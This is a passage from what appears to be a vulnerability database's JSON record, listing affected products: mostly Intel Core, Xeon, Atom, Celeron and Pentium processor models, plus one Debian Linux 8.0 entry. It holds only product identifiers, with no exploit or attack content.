        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2810"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v3"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v4"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2480"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4980hq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v4"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6402p"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7295"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5300u"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5540"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4000"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4603"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3540m"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3508"
      },
      {
        "_id": null,
        "model": "atom x5-e3940",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3820qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5500u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4890_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2608l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3689y"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3827"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "950"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380um"
      },
      {
        "_id": null,
        "model": "xeon e5 2470 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775r"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5157u"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2518"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5506"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4628l_v4"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8850"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5122"
      },
      {
        "_id": null,
        "model": "xeon e3 1260l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126t"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2930"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2580"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7250f"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4250u"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7542"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2910"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300y"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "740qm"
      },
      {
        "_id": null,
        "model": "xeon e3 1235l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8158"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217ue"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5606"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870_v2"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675c"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2760"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450p"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5509"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v3"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1578l_v5"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v3"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2760qm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770"
      },
      {
        "_id": null,
        "model": "xeon e5 2440",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3437u"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2380p"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700mq"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5549"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3540"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "350m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570"
      },
      {
        "_id": null,
        "model": "xeon e3 1125c v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3630qm"
      },
      {
        "_id": null,
        "model": "xeon e5 2620 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v2"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3000"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790k"
      },
      {
        "_id": null,
        "model": "xeon e5 2648l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3740"
      },
      {
        "_id": null,
        "model": "xeon e5 2648l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2320"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660lm"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770r"
      },
      {
        "_id": null,
        "model": "xeon e5 1680 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v3"
      },
      {
        "_id": null,
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y30"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1850"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3690"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600"
      },
      {
        "_id": null,
        "model": "xeon e3 1125c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5020u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2312m"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4005"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8830"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400"
      },
      {
        "_id": null,
        "model": "xeon e5 2420",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700eq"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010y"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500s"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1750"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3805"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v2"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7210"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v2"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2550k"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3245"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5680"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3130"
      },
      {
        "_id": null,
        "model": "xeon e3 1275 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1505m_v6"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4200"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690k"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3632qm"
      },
      {
        "_id": null,
        "model": "xeon e5 1650 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2618l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2358"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qm"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "875k"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "820qm"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5115"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100u"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v3"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4800mq"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3560"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4005u"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735d"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3060"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3350p"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620ue"
      },
      {
        "_id": null,
        "model": "xeon e3 1245",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y71"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3740qm"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2350"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5257u"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2840"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160t"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860hq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4765t"
      },
      {
        "_id": null,
        "model": "xeon e3 1281 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2418l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1280 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110m"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3785"
      },
      {
        "_id": null,
        "model": "xeon e3 1271 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2450",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3455"
      },
      {
        "_id": null,
        "model": "xeon e5 2428l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600u"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v4"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520e"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qm"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2308"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "670"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "480m"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3150"
      },
      {
        "_id": null,
        "model": "xeon e3 1290 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v3"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8857_v2"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3808"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3770"
      },
      {
        "_id": null,
        "model": "xeon e3 1230 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6098p"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600m"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2920"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4750hq"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2850"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4260u"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6136"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4722hq"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3745d"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440s"
      },
      {
        "_id": null,
        "model": "xeon e5 2450 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2637m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2698_v3"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2405s"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2316"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2940"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2700k"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4880_v2"
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7290f"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x6550"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360u"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2830"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470s"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3130m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460t"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770hq"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610y"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610m"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3825"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2558"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2420"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3360m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8250u"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6006u"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3440"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8180"
      },
      {
        "_id": null,
